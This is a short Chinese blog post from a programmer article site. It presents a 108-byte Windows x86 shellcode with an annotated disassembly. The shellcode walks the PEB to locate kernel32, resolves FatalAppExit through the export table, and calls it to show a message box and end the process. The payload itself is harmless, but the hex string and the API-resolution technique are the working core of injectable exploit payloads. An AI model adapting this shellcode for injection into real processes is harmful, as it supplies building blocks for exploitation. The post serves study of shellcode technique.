欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

shellcode搜集

程序员文章站 2024-02-12 10:40:40
...

好像WINDOWS版本都行的   利用 FatalAppExit  函数 弹出对话框 然后结束  shellcode串很短

00406032    B2 30           mov dl,0x30
00406034    64:8B12         mov edx,dword ptr fs:[edx]
00406037    8B52 0C         mov edx,dword ptr ds:[edx+0xC]             ; _PEB_LDR_DATA
0040603A    8B52 1C         mov edx,dword ptr ds:[edx+0x1C]            ; InInitializationOrderModuleList 第一项
0040603D    8B42 08         mov eax,dword ptr ds:[edx+0x8]             ; InMemoryOrderLinks
00406040    8B72 20         mov esi,dword ptr ds:[edx+0x20]            ; FullDllName
00406043    8B12            mov edx,dword ptr ds:[edx]                 ; InInitializationOrderModuleList 第二项
00406045    807E 0C 33      cmp byte ptr ds:[esi+0xC],0x33
00406049  ^ 75 F2           jnz XlastTest.0040603D
0040604B    89C7            mov edi,eax
0040604D    0378 3C         add edi,dword ptr ds:[eax+0x3C]            ; pe
00406050    8B57 78         mov edx,dword ptr ds:[edi+0x78]            ; 导出表
00406053    01C2            add edx,eax
00406055    8B7A 20         mov edi,dword ptr ds:[edx+0x20]            ; ENT
00406058    01C7            add edi,eax
0040605A    31ED            xor ebp,ebp
0040605C    8B34AF          mov esi,dword ptr ds:[edi+ebp*4]
0040605F    01C6            add esi,eax
00406061    45              inc ebp
00406062    813E 46617461   cmp dword ptr ds:[esi],0x61746146          ; CMP NAME 0-3
00406068  ^ 75 F2           jnz XlastTest.0040605C
0040606A    817E 08 4578697>cmp dword ptr ds:[esi+0x8],0x74697845      ; 8-11
00406071  ^ 75 E9           jnz XlastTest.0040605C                     ; FatalAppExit 函数显示一个消息框,并终止应用程序时,消息框关闭
00406073    8B7A 24         mov edi,dword ptr ds:[edx+0x24]            ; 导出***数组
00406076    01C7            add edi,eax
00406078    66:8B2C6F       mov bp,word ptr ds:[edi+ebp*2]             ; 得到***
0040607C    8B7A 1C         mov edi,dword ptr ds:[edx+0x1C]            ; EAT
0040607F    01C7            add edi,eax
00406081    8B7CAF FC       mov edi,dword ptr ds:[edi+ebp*4-0x4]       ; 得到函数地址
00406085    01C7            add edi,eax                                ; get the address of FatalAppExiA
00406087    68 64614001     push 0x1406164
0040608C    68 4070616E     push 0x6E617040
00406096    89E1            mov ecx,esp
00406098    FE49 07         dec byte ptr ds:[ecx+0x7]
0040609B    31C0            xor eax,eax
0040609D    51              push ecx
0040609E    50              push eax
0040609F    FFD7            call edi

"\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B"
"\x12\x80\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20"
"\x01\xC7\x31\xED\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E"
"\x08\x45\x78\x69\x74\x75\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01"
"\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68\x64\x61\x40\x01\x68\x40\x70\x61\x6E\x89\xE1\xFE"
"\x49\x07\x31\xC0\x51\x50\xFF\xD7"
//108 bytes  Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3